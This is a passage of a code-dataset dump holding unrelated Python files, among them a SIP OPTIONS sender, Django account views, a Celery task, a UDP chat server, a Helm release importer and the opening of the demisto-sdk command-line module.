self.write('1SR{}?'.format(self.axes[axis]))\r\n rd = self.read()[3:]\r\n rd = rd[len(self.axes[axis]):]\r\n \r\n #Format and set MXPS instance variable \r\n temp_lim.append(float(rd))\r\n\r\n self.lims[axis] = temp_lim\r\n \r\n return self.lims \r\n","sub_path":"nsfiu/support/Python/Conex.py","file_name":"Conex.py","file_ext":"py","file_size_in_byte":27443,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"222792599","text":"import socket\nimport sys\nfrom time import strftime, gmtime\n\n# Create a UDP socket\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\nserver_address = ('10.0.1.222', 5060)\nRFC1123_date = str(strftime(\"%a, %d %b %Y %H:%M:%S +0000\", gmtime()))\nMESSAGE = (\n 'OPTIONS sip:Desktop@10.0.1.43;transport=udp SIP/2.0\\r\\n'\n 'Via: SIP/2.0/UDP 10.0.1.222:5060;branch=z9hG4bK779769ef;rport\\r\\n'\n 'Max-Forwards: 70\\r\\n'\n 'From: \"asterisk\" ;tag=as0372b144\\r\\n'\n 'To: \\r\\n'\n 'Contact: \\r\\n'\n 'Call-ID: 426fb56170cf3c25547ef70b695e91e1@10.0.1.222:5060\\r\\n'\n 'CSeq: 102 OPTIONS\\r\\n'\n 'User-Agent: PythonAsterisk\\r\\n'\n 'Date: ' + RFC1123_date + '\\r\\n'\n 'Allow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH\\r\\n'\n 'Supported: replaces, timer\\r\\n'\n 'Content-Length: 0\\r\\n'\n '\\r\\n'\n)\n\nMESSAGE = MESSAGE.format(RFC1123_date)\nprint(MESSAGE);\n\nacciiMESSAGE = (MESSAGE.encode('ascii'))\n\n\ntry:\n\n # Send data\n print('sending \"%s\"' % acciiMESSAGE)\n sent = sock.sendto(acciiMESSAGE, server_address)\n\n # Receive response\n print('waiting to receive\\n')\n data, server = sock.recvfrom(4096)\n data = data.decode('utf-8')\n print('received \\n\"%s\"' % data)\n\nfinally:\n print('closing socket')\n sock.close()\n","sub_path":"Stuff I started with and can probably canibalise but probably shouldnt/SendOPTIONS2.py","file_name":"SendOPTIONS2.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"78044185","text":"from celery import Celery\nfrom sqlalchemy.orm import scoped_session\n\nfrom classes.Errors import UserException, ServiceUnreachable\nfrom database import db, StatsTab\nfrom sqlalchemy import and_\n\nfrom classes.Stats import Stats\n\nBACKEND = BROKER = 'redis://localhost:6379'\n# BACKEND = BROKER = 'redis://0.0.0.0:6379'\n\ncelery = Celery(__name__, backend=BACKEND, broker=BROKER)\n\n_APP = None\n\n\n@celery.task\ndef calc_stats_async(user_id):\n global _APP\n if _APP is None:\n from app import create_app\n app = create_app()\n else:\n app = _APP\n with app.app_context():\n stats: Stats\n\n try:\n stats = Stats(user_id)\n except UserException:\n print('Try get Stats from unknown user wit id ' + str(user_id))\n return\n except ServiceUnreachable as e:\n print(e)\n return\n except Exception as e:\n print('Unexpected Exception')\n print(e)\n return\n\n session = db.session\n\n q = session.query(StatsTab).filter(StatsTab.user_id == user_id)\n stats_db = q.first()\n\n if not stats_db:\n stats_db = StatsTab()\n stats_db.user_id = stats.user.id\n stats_db.email = stats.user.email\n stats_db.firstname = stats.user.firstname\n stats_db.lastname = stats.user.lastname\n session.add(stats_db)\n\n stats_db.numStories = stats.numStories\n stats_db.numDice = stats.numDice\n stats_db.likes = stats.likes\n stats_db.dislikes = stats.dislikes\n\n stats_db.avgLike = stats.avgLike\n stats_db.avgDislike = stats.avgDislike\n stats_db.avgDice = stats.avgDice\n\n stats_db.ratio_likeDislike = stats.ratio_likeDislike\n stats_db.love_level = stats.love_level\n\n # db.session.add(stats_db)\n session.commit()\n","sub_path":"background.py","file_name":"background.py","file_ext":"py","file_size_in_byte":1868,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"622458182","text":"# -*- coding: utf-8 -*-\nfrom django.contrib.auth.decorators import login_required\nfrom django.contrib.auth import login, authenticate\nfrom django.shortcuts import render, redirect\nfrom django.http import JsonResponse, HttpResponse, HttpResponseRedirect\nfrom forms import UserForm, ProfileForm,RegistrationForm\nfrom django.db import transaction\nfrom django.contrib import messages\nfrom suvenirka_order.models import *\nfrom suvenirka_product.models import *\nfrom accounts.models import *\nfrom suvenirka_product.forms import QuestionProdukt\nfrom django.contrib.auth.forms import UserChangeForm, PasswordChangeForm\n\n#@login_required\n#def home(request):\n# return render(request, 'update_profile')\n\ndef login_all(request):\n if request.POST:\n print('POST')\n username=request.POST.get('username','')\n password=request.POST.get('password','')\n user=authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n print(\"auth is ok!\")\n print(request.META.get('HTTP_REFERER'))\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n else:\n args['login_error']=\"Пользователь не найден\"\n return HttpResponseRedirect(request.META.get('HTTP_REFERER'))\n\n else:\n return render(request, 'accounts/log_all.html', locals())\n\n\n\ndef signup(request):\n if request.method =='POST':\n form = RegistrationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('update_profile')\n else:\n form = RegistrationForm()\n\n args = {'form': form}\n return render(request, 'accounts/signup.html', {'form': form})\n\n\n\n@login_required\ndef view_profile(request):\n form = QuestionProdukt(request.POST or None)\n if request.method == \"POST\" and form.is_valid():\n print (\"FORMA VOPROSA PROSHLA\")\n data = form.cleaned_data\n data = request.POST\n you_name = request.user.username\n you_phone = request.user.profile.tel_number\n you_question = data[\"you_question\"]\n print (data)\n paf= request.path\n paf_url=paf\n print (paf_url)\n instance = IssuesProdukt.objects.create(issues_url=paf_url,you_name=you_name,you_phone=you_phone,you_question=you_question)\n instance.save()\n messages.success(request, ('Ваш вопрос получен. Наш менеджер свяжется с Вами в близжайшее время!'))\n return HttpResponseRedirect(request.META['HTTP_REFERER'])\n user_view = User.objects.filter(id=request.user.id)\n profile = Profile.objects.filter(id=request.user.id)\n orders = ProductInOrder.objects.filter(order__user=request.user.id)\n\n\n return render(request, 'accounts/profile_view.html', locals())\n\n\n\n@login_required\n@transaction.atomic\ndef update_profile(request):\n if request.method == 'POST':\n print('POST')\n user_form = UserForm(request.POST, instance=request.user)\n profile_form = ProfileForm(request.POST, instance=request.user.profile)\n if user_form.is_valid() and profile_form.is_valid():\n user_form.save()\n profile_form.save()\n messages.success(request, ('Ваши данные успешно обновлены'))\n print('form too is valid')\n return redirect('update_profile')\n else:\n messages.error(request, ('Error:Пожалуйста проверьте введенные данные!'))\n else:\n user_form = UserForm(instance=request.user)\n profile_form = ProfileForm(instance=request.user.profile)\n return render(request, 'accounts/profile.html', {\n 'user_form': user_form,\n 'profile_form': profile_form\n })\n","sub_path":"tv_mas/accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"176899939","text":"import json\r\nfrom flask import Flask, render_template, request, jsonify \r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/\")\r\ndef home():\r\n return render_template(\"InputOutput.html\") \r\n \r\n\r\n@app.route(\"/submitJSON\", methods=[\"POST\"])\r\ndef processJSON(): \r\n jsonStr = request.get_json()\r\n jsonObj = json.loads(jsonStr) \r\n \r\n response = \"\"\r\n a=int(jsonObj['a'])\r\n b=int(jsonObj['b'])\r\n c=int(jsonObj['c'])\r\n d=int(jsonObj['d'])\r\n k=b\r\n b=a\r\n a=k\r\n response+=\" The new value of a is \"+str(a)+\" The new value of b is \"+str(b)+\"
\"\r\n response+=\" The new value of c is \"+str((c^d)^c)+\" The new value of d is \"+str((c^d)^d)+\"
\" \r\n a = 20\r\n b = 10\r\n c = 15\r\n d = 5\r\n e1=(a + b) * c // d >>1\r\n e2=(a + b * c) // d>>1\r\n e3=(a + b) * (c // (d>>1))\r\n e4=a + (b * c) // d>>1\r\n response+=\" Value of e1 is \"+str(e1)+\"
\" \r\n response+=\" Value of e2 is \"+str(e2)+\"
\"\r\n response+=\" Value of e3 is \"+str(e3)+\"
\"\r\n response+=\" Value of e4 is \"+str(e4)+\"
\" \r\n \r\n \r\n \t \r\n return response\r\n \r\n \r\nif __name__ == \"__main__\":\r\n app.run(debug=True)\r\n \r\n \r\n","sub_path":"convertion.py","file_name":"convertion.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"623196054","text":"#tuples\na=('a', 1, 'doi', True)\nb='b', 2, 'trei', False\n\nprint(type(a))\nprint(type(b))\nprint(a+b)\n\nd={'name':'', 'age':0, 'profession':''}\nd['name']=input()\nd['age']=input()\nd['profession']=input()\nprint(d)","sub_path":"basic2.py","file_name":"basic2.py","file_ext":"py","file_size_in_byte":206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"345018962","text":"N = int(input())\nA = [0]*N\nB = [0]*N\nfor i in range(N):\n A[i],B[i] = map(int, input().split())\nA.sort()\nB.sort(reverse=True)\nif N%2==1:\n mid = (N+1)//2-1\n ans = B[mid]-A[mid]+1\nelse:\n mid1 = N//2-1\n mid2 = N//2\n ans = (B[mid1]+B[mid2])-(A[mid1]+A[mid2])+1\n\nprint(ans)\n","sub_path":"Python_codes/p02661/s050407528.py","file_name":"s050407528.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"475901386","text":"# -*- coding: utf-8 -*-\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nfrom ralph.util import plugin, api_pricing\nfrom ralph_pricing.models import Venture\n\n\ndef update_venture(data):\n venture, created = Venture.objects.get_or_create(\n venture_id=data['id'],\n )\n venture.name = data['name']\n venture.department = data['department']\n venture.symbol = data['symbol']\n venture.business_segment = data['business_segment']\n venture.profit_center = data['profit_center'] or ''\n venture.is_active = data['show_in_ralph']\n if data.get('parent_id'):\n parent, parent_created = Venture.objects.get_or_create(\n venture_id=data['parent_id'],\n )\n venture.parent = parent\n else:\n venture.parent = None\n parent_created = False\n venture.save()\n return created + parent_created\n\n\n@plugin.register(chain='pricing', requires=[])\ndef ventures(**kwargs):\n \"\"\"Updates the ventures from Ralph.\"\"\"\n\n count = sum(update_venture(data) for data in api_pricing.get_ventures())\n Venture.tree.rebuild()\n return True, '%d new ventures' % count, kwargs\n","sub_path":"src/ralph_pricing/plugins/collects/ventures.py","file_name":"ventures.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"605560762","text":"# -*- coding: utf8 -*-fr\n# pylint: disable=too-many-instance-attributes, invalid-name\n\"\"\"\nHasManager is a mixin representing the manager attached to some of the objects.\n\"\"\"\n\nfrom itopapi.model.prototype import ItopapiPrototype\n\n__version__ = '1.0'\n__authors__ = ['Julien Nauroy ']\n\n\nclass HasManager(object):\n \"\"\"\n HasManager represents the Manager attached to some top-level objects.\n \"\"\"\n\n \"\"\" Configuration specific to itop \"\"\"\n foreign_key = {'id': 'manager_id', 'name': 'manager_name', 'table': 'Person'}\n\n def __init__(self):\n super(HasManager, self).__init__()\n\n # Object's manager id. Call find_manager to get the full information or just use manager_name\n self.manager_id = None\n # Object's manager id's friendly name. Not sure the difference with manager_name\n self.manager_id_friendlyname = None\n # Object's manager name\n self.manager_name = None\n\n def find_manager(self):\n \"\"\"\n Retrieve the ItopapiManager related to this instance\n \"\"\"\n if self.manager_id is not None:\n return ItopapiPrototype.get_itop_class('Person').find(self.manager_id)\n return None\n\n def set_manager(self, manager):\n \"\"\"\n Set the ItopapiPerson parameters\n \"\"\"\n self.manager_id = manager.instance_id\n self.manager_id_friendlyname = manager.friendlyname\n self.manager_name = manager.name\n","sub_path":"itopapi/model/features/hasManager.py","file_name":"hasManager.py","file_ext":"py","file_size_in_byte":1457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"640810925","text":"\"\"\"\nAuthor: Levi\nEmail: lvze@tedu.cn\nTime : 2020-12-15\nEnv : Python3.6\n\nsocket and process exercise\n\"\"\"\nfrom socket import *\nfrom multiprocessing import Process\n\n# 服务器地址\nHOST = \"0.0.0.0\"\nPORT = 8888\nADDR = (HOST, PORT)\n\n# 存储用户信息的结构 {name:address}\nuser = {}\n\n\ndef do_login(sock, name, address):\n if name in user or \"管理\" in name:\n sock.sendto(b\"FAIL\", address)\n else:\n sock.sendto(b\"OK\", address)\n # 先通知其他人\n msg = \"欢迎 %s 进入聊天室\" % name\n for key, value in user.items():\n sock.sendto(msg.encode(), value)\n # 加入用户\n user[name] = address\n\n\ndef do_chat(sock, name, content):\n msg = \"%s : %s\" % (name, content)\n for key, value in user.items():\n # 不是本人\n if key != name:\n sock.sendto(msg.encode(), value)\n\n\ndef do_exit(sock, name):\n del user[name] # 从字典删除\n msg = \"%s 退出了聊天\" % name\n # 通知其他人\n for key, value in user.items():\n sock.sendto(msg.encode(), value)\n\n\ndef handle(sock):\n # 循环接收用户请求\n while True:\n data, addr = sock.recvfrom(1024)\n tmp = data.decode().split(' ', 2)\n # 根据请求,分情况讨论\n if tmp[0] == \"LOGIN\":\n # tmp->[LOGIN,name]\n do_login(sock, tmp[1], addr)\n elif tmp[0] == \"CHAT\":\n # tmp->[CHAT,name,xxxx]\n do_chat(sock, tmp[1], tmp[2])\n elif tmp[0] == \"EXIT\":\n # tmp->[EXIT,name]\n do_exit(sock, tmp[1])\n\n\n# 搭建总体逻辑结构\ndef main():\n # 创建udp套接字\n sock = socket(AF_INET, SOCK_DGRAM)\n sock.bind(ADDR)\n\n p = Process(target=handle, args=(sock,), daemon=True)\n p.start()\n\n # 父进程发送管理员消息\n while True:\n content = input(\"管理员消息:\")\n if content == \"exit\":\n break\n msg = \"CHAT 管理员消息 \"+content\n # 发送给子进程\n sock.sendto(msg.encode(),ADDR)\n\n\nif __name__ == '__main__':\n main() # 启动\n","sub_path":"month02/day14/chat_server.py","file_name":"chat_server.py","file_ext":"py","file_size_in_byte":2077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"154771981","text":"\n# coding: utf-8\n\n# In[1]:\n\n\nimport shelve\nimport numpy\nimport models\nimport exts\n\n\n# In[2]:\n\n\nd_list = [0.01, 0.1, 1.0, 10.0]\nd_name = [\"0.01\", \"0.1\", \"1.0\", \"10.0\"]\nn = 100\nh = 1.0 / n\nm_list = [\n 2, 3, 4, 6, 8, 12, 17, 25, 35, 50, 70, 100, 141, 200,\n 282, 400, 565, 800, 1131, 1600, 2262, 3200, 4525, 6400,\n 9050, 12800, 18101, 25600, 36203, 51200, 72407, 102400,\n 144815, 204800, 289630, 409600, 579261, 819200\n]\ntheta_name = [\"0\", \" 1 / 2 \", \" 1 / 2 - 1 / 12 \\\\mu \", \"1\"]\n\n\n# In[3]:\n\n\nrt = [{}, {}]\n\n\n# In[4]:\n\n\nfor d in d_list:\n \n for i in range(4):\n rt[0][str((d, i))] = [] \n rt[1][str((d, i))] = []\n \n for m in m_list:\n \n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, 0.0, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 0))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 0))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n \n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, 0.5, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 1))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 1))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n \n tau = 1.0 / m\n mu = tau / h**2\n theta = 1.0 / 2.0 - 1.0 / 12.0 / mu\n if theta <= 1.0:\n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, theta, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 2))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 2))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n else:\n rt[0][str((d, 2))].append(numpy.infty)\n rt[1][str((d, 2))].append(numpy.infty)\n \n u = models.calc_init_3(n)\n exts.para_theta_model_wrapper(n, int(m * d + 0.5), d, 1.0, u)\n u_ana = models.calc_approx_3(n, d)\n rt[0][str((d, 3))].append(numpy.linalg.norm(u - u_ana, numpy.infty))\n rt[1][str((d, 3))].append(numpy.linalg.norm(u - u_ana, 2.0) * numpy.sqrt(h))\n \n print(\"d = {}, m = {} finished\".format(d, m))\n\n\n# In[5]:\n\n\nwith shelve.open(\"Result\") as db:\n db[str((2, 5, \"d\"))] = d_list\n db[str((2, 5, \"d\", \"name\"))] = d_name\n db[str((2, 5, \"m\"))] = m_list\n db[str((2, 5, \"theta\", \"name\"))] = theta_name\n db[str((2, 5, \"normi\"))] = rt[0]\n db[str((2, 5, \"norm2\"))] = rt[1]\n\n","sub_path":"P03Discont/Problem2Part5.py","file_name":"Problem2Part5.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"437934513","text":"import openpyxl\nimport csv\n#csvfile = \"input.csv\"\ncsvfile = \"/Users/hegderajesh/Downloads/MUHURTHA REGISTRATION.csv\"\nxlfile = 'format.xlsx'\n\n# initializing the titles and rows list \nfields = [] \nrows = []\n\n# reading csv file \nwith open(csvfile, 'r') as csvfile: \n # creating a csv reader object \n csvreader = csv.reader(csvfile) \n \n # extracting field names through first row \n fields = next(csvreader) \n \n # extracting each data row one by one \n for row in csvreader: \n rows.append(row)\n\n # open xlsx file and select sheet1\nwb = openpyxl.load_workbook(filename=xlfile)\nws = wb.get_sheet_by_name('Sheet1')\n\nfor i in range(len(rows)):\n print('Processing', i ,'row')\n # writing data to cell in loop\n ws.cell(row=5, column=4, value=rows[i][3])\n ws.cell(row=5, column=3, value='Name of '+rows[i][2])\n ws.cell(row=5, column=7, value=rows[i][4])\n ws.cell(row=6, column=4, value=rows[i][5])\n ws.cell(row=6, column=7, value=rows[i][6])\n ws.cell(row=7, column=4, value=rows[i][7])\n ws.cell(row=7, column=7, value=rows[i][8])\n ws.cell(row=8, column=4, value=rows[i][9])\n ws.cell(row=8, column=7, value=rows[i][10])\n ws.cell(row=9, column=4, value=rows[i][11])\n ws.cell(row=9, column=7, value=rows[i][12])\n ws.cell(row=10, column=4, value=rows[i][13])\n ws.cell(row=10, column=7, value=rows[i][14])\n ws.cell(row=11, column=4, value=rows[i][15])\n ws.cell(row=11, column=7, value=rows[i][16])\n ws.cell(row=12, column=4, value=rows[i][17])\n ws.cell(row=12, column=7, value=rows[i][18])\n ws.cell(row=13, column=4, value=rows[i][19])\n ws.cell(row=13, column=7, value=rows[i][20])\n ws.cell(row=14, column=4, value=rows[i][1])\n ws.cell(row=14, column=7, value=rows[i][21])\n ws.cell(row=16, column=7, value=rows[i][0])\n ws.cell(row=21, column=3, value=rows[i][25])\n ws.cell(row=23, column=4, value=rows[i][23])\n # save file\n new_filename = rows[i][1]\n wb.save('/Users/hegderajesh/Documents/Website/Muhurtha/MuhurthaFiles/'+new_filename+'.xlsx')\n print('Done. Saved!')","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"68408111","text":"# -- coding: utf-8 --\n\n# Copyright 2019 FairwindsOps Inc\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport json\nimport logging\n\nfrom .helm.client import get_helm_client\nfrom .config import Config\nfrom .exception import ReckonerException\n\nlogger = logger = logging.getLogger(__name__)\n\n\ndef get_values(release: str, namespace: str) -> dict:\n \"\"\"\n Gets the user supplied values from the helm release specified\n Arguments:\n release: The name of the release to import. No default.\n namespace: The namespace of the release to import. No default.\n\n Returns:\n Dictionary of release values\n \"\"\"\n helm_client = get_helm_client(helm_arguments=Config().helm_args)\n response = helm_client.get_values(\n [f'--namespace={namespace}', release]\n )\n if response.exit_code:\n raise ReckonerException(f'Error getting values: {response.stderr}')\n\n return json.loads(response.stdout)\n\n\ndef list_release(release: str, namespace: str) -> dict:\n \"\"\"\n Gets chart name and chart version information about the release specified\n Arguments:\n release: The name of the release to import. No default.\n namespace: The namespace of the release to import. No default.\n\n Returns:\n Dictionary of realease information\n \"\"\"\n helm_client = get_helm_client(helm_arguments=Config().helm_args)\n response = helm_client.list_releases(\n [f'--namespace={namespace}']\n )\n\n if response.exit_code:\n raise ReckonerException(f'Error getting release: {response.stderr}')\n\n for _release in json.loads(response.stdout):\n if _release.get('name') == release:\n return _release\n\n raise ReckonerException(f\"Release {release} not found in {namespace}\")\n\n\ndef draft_release(release: str, namespace: str, repository: str) -> dict:\n \"\"\"\n Parses release information and values, then parses them together into a dictionary\n with the specified release, namespace, repository, and values\n Arguments:\n release: The name of the release to import. No default.\n namespace: The namespace of the release to import. No default.\n repository: The repository the chart is from. No Default\n\n Returns:\n Dictionary of realease information\n \"\"\"\n release_info = list_release(release, namespace)\n release_values = get_values(release, namespace)\n\n output = {\n release: {\n 'chart': \"-\".join(release_info.get('chart', '').split('-')[0:-1]),\n 'repository': repository,\n 'version': release_info.get('chart', '').split('-')[-1],\n 'namespace': namespace,\n 'values': release_values,\n }\n }\n\n return output\n","sub_path":"reckoner/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":3157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"531148527","text":"# Site packages\nimport json\nimport logging\nimport os\nimport sys\nfrom configparser import ConfigParser, MissingSectionHeaderError\nfrom pathlib import Path\nfrom typing import IO\n\nfrom pkg_resources import get_distribution\n\n# Third party packages\nimport click\nimport git\nfrom demisto_sdk.commands.common import tools\nfrom demisto_sdk.commands.common.configuration import Configuration\n# Common tools\nfrom demisto_sdk.commands.common.constants import (\n API_MODULES_PACK, SKIP_RELEASE_NOTES_FOR_TYPES, FileType)\nfrom demisto_sdk.commands.common.legacy_git_tools import get_packs\nfrom demisto_sdk.commands.common.logger import logging_setup\nfrom demisto_sdk.commands.common.tools import (filter_files_by_type,\n filter_files_on_pack, find_type,\n get_last_remote_release_version,\n get_pack_name, print_error,\n print_warning)\nfrom demisto_sdk.commands.common.update_id_set import merge_id_sets_from_files\nfrom demisto_sdk.commands.create_artifacts.content_artifacts_creator import \\\n ArtifactsManager\nfrom demisto_sdk.commands.create_id_set.create_id_set import IDSetCreator\nfrom demisto_sdk.commands.doc_reviewer.doc_reviewer import DocReviewer\nfrom demisto_sdk.commands.download.downloader import Downloader\nfrom demisto_sdk.commands.find_dependencies.find_dependencies import \\\n PackDependencies\nfrom demisto_sdk.commands.format.format_module import format_manager\nfrom demisto_sdk.commands.generate_docs.generate_integration_doc import \\\n generate_integration_doc\nfrom demisto_sdk.commands.generate_docs.generate_playbook_doc import \\\n generate_playbook_doc\nfrom demisto_sdk.commands.generate_docs.generate_script_doc import \\\n generate_script_doc\nfrom demisto_sdk.commands.generate_integration.code_generator import \\\n IntegrationGeneratorConfig\nfrom demisto_sdk.commands.generate_test_playbook.test_playbook_generator import \\\n PlaybookTestsGenerator\nfrom demisto_sdk.commands.init.initiator import Initiator\nfrom demisto_sdk.commands.integration_diff.integration_diff_detector import \\\n IntegrationDiffDetector\nfrom demisto_sdk.commands.json_to_outputs.json_to_outputs import \\\n json_to_outputs\nfrom demisto_sdk.commands.lint.lint_manager import LintManager\nfrom demisto_sdk.commands.openapi_codegen.openapi_codegen import \\\n OpenAPIIntegration\nfrom demisto_sdk.commands.postman_codegen.postman_codegen import \\\n postman_to_autogen_configuration\n# Import demisto-sdk commands\nfrom demisto_sdk.commands.run_cmd.runner import Runner\nfrom demisto_sdk.commands.run_playbook.playbook_runner import PlaybookRunner\nfrom demisto_sdk.commands.secrets.secrets import SecretsValidator\nfrom demisto_sdk.commands.split_yml.extractor import Extractor\nfrom demisto_sdk.commands.test_content.execute_test_content import \\\n execute_test_content\nfrom demisto_sdk.commands.unify.unifier import Unifier\nfrom demisto_sdk.commands.update_release_notes.update_rn import (\n UpdateRN, update_api_modules_dependents_rn)\nfrom demisto_sdk.commands.upload.uploader import Uploader\nfrom demisto_sdk.commands.validate.validate_manager import ValidateManager\n\n\nclass PathsParamType(click.Path):\n \"\"\"\n Defines a click options type for use with the @click.option decorator\n\n The type accepts a string of comma-separated values where each individual value adheres\n to the definition for the click.Path type. The class accepts the same parameters as the\n click.Path type, applying those arguments for each comma-separated value in the list.\n See https://click.palletsprojects.com/en/8.0.x/parameters/#implementing-custom-types for\n more details.\n \"\"\"\n\n def convert(self, value, param, ctx):\n if ',' not in value:\n return super(PathsParamType, self).convert(value, param, ctx)\n\n split_paths = value.split(',')\n # check the validity of each of the paths\n _ = [super(PathsParamType, self).convert(path, param, ctx) for path in split_paths]\n return value\n\n\nclass DemistoSDK:\n \"\"\"\n The core class for the SDK.\n \"\"\"\n\n def __init__(self):\n self.configuration = None\n\n\npass_config = click.make_pass_decorator(DemistoSDK, ensure=True)\n\n\ndef check_configuration_file(command, args):\n config_file_path = '.demisto-sdk-conf'\n true_synonyms = ['true', 'True', 't', '1']\n if os.path.isfile(config_file_path):\n try:\n config = ConfigParser(allow_no_value=True)\n config.read(config_file_path)\n\n if command in config.sections():\n for key in config[command]:\n if key in args:\n # if the key exists in the args we will run it over if it is either:\n # a - a flag currently not set and is defined in the conf file\n # b - not a flag but an arg that is currently None and there is a value for it in the conf file\n if args[key] is False and config[command][key] in true_synonyms:\n args[key] = True\n\n elif args[key] is None and config[command][key] is not None:\n args[key] = config[command][key]\n\n # if the key does not exist in the current args, add it\n else:\n if config[command][key] in true_synonyms:\n args[key] = True\n\n else:\n args[key] = config[command][key]\n\n except MissingSectionHeaderError:\n pass\n\n\n@click.group(invoke_without_command=True, no_args_is_help=True, context_settings=dict(max_content_width=100), )\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-v', '--version', help='Get the demisto-sdk version.',\n is_flag=True, default=False, show_default=True\n)\n@pass_config\ndef main(config, version):\n config.configuration = Configuration()\n if not os.getenv('DEMISTO_SDK_SKIP_VERSION_CHECK') or version: # If the key exists/called to version\n cur_version = get_distribution('demisto-sdk').version\n last_release = get_last_remote_release_version()\n print_warning(f'You are using demisto-sdk {cur_version}.')\n if last_release and cur_version != last_release:\n print_warning(f'however version {last_release} is available.\\n'\n f'You should consider upgrading via \"pip3 install --upgrade demisto-sdk\" command.')\n\n\n# ====================== split-yml ====================== #\n@main.command()\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '-i', '--input', help='The yml file to extract from', required=True\n)\n@click.option(\n '-o', '--output', required=True,\n help=\"The output dir to write the extracted code/description/image to.\"\n)\n@click.option(\n '--no-demisto-mock',\n help=\"Don't add an import for demisto mock.\",\n is_flag=True,\n show_default=True\n)\n@click.option(\n '--no-common-server',\n help=\"Don't add an import for CommonServerPython.\",\n is_flag=True,\n show_default=True\n)\n@click.option(\n '--no-auto-create-dir',\n help=\"Don't auto create the directory if the target directory ends with *Integrations/*Scripts.\",\n is_flag=True,\n show_default=True\n)\n@click.option(\n '--no-pipenv',\n help=\"Don't auto create pipenv for requirements installation.\",\n is_flag=True,\n show_default=True\n)\n@pass_config\ndef split_yml(config, **kwargs):\n \"\"\"Split the code, image and description files from a Demisto integration or script yaml file\n to multiple files(To a package format - https://demisto.pan.dev/docs/package-dir).\n \"\"\"\n check_configuration_file('split-yml', kwargs)\n file_type: FileType = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n if file_type not in [FileType.INTEGRATION, FileType.SCRIPT]:\n print_error('File is not an Integration or Script.')\n return 1\n extractor = Extractor(configuration=config.configuration, file_type=file_type.value, **kwargs)\n return extractor.extract_to_package_format()\n\n\n# ====================== extract-code ====================== #\n@main.command(hidden=True)\n@click.help_option(\n '-h', '--help'\n)\n@click.option(\n '--input', '-i',\n help='The yml file to extract from',\n required=True\n)\n@click.option(\n '--output', '-o',\n required=True,\n help=\"The output file to write the code to\"\n)\n@click.option(\n '--no-demisto-mock',\n help=\"Don't add an import for demisto mock, false by default\",\n is_flag=True,\n show_default=True\n)\n@click.option(\n '--no-common-server',\n help=\"Don't add an import for CommonServerPython.\"\n \"If not specified will import unless this is CommonServerPython\",\n is_flag=True,\n show_default=True\n)\n@pass_config\ndef extract_code(config, **kwargs):\n \"\"\"Extract code from a Demisto integration or script yaml file.\"\"\"\n check_configuration_file('extract-code', kwargs)\n file_type: FileType = find_type(kwargs.get('input', ''), ignore_sub_categories=True)\n if file_type not in [FileType.INTEGRATION, FileType.SCRIPT]:\n print_error('File is not an Integration or Script.')\n return 1\n extractor = Extractor(configuration=config.configuration, file_type=file_type.value, **kwargs)\n return extractor.extract_code(kwargs['outfile'])\n\n\n# ====================== unify ====================== 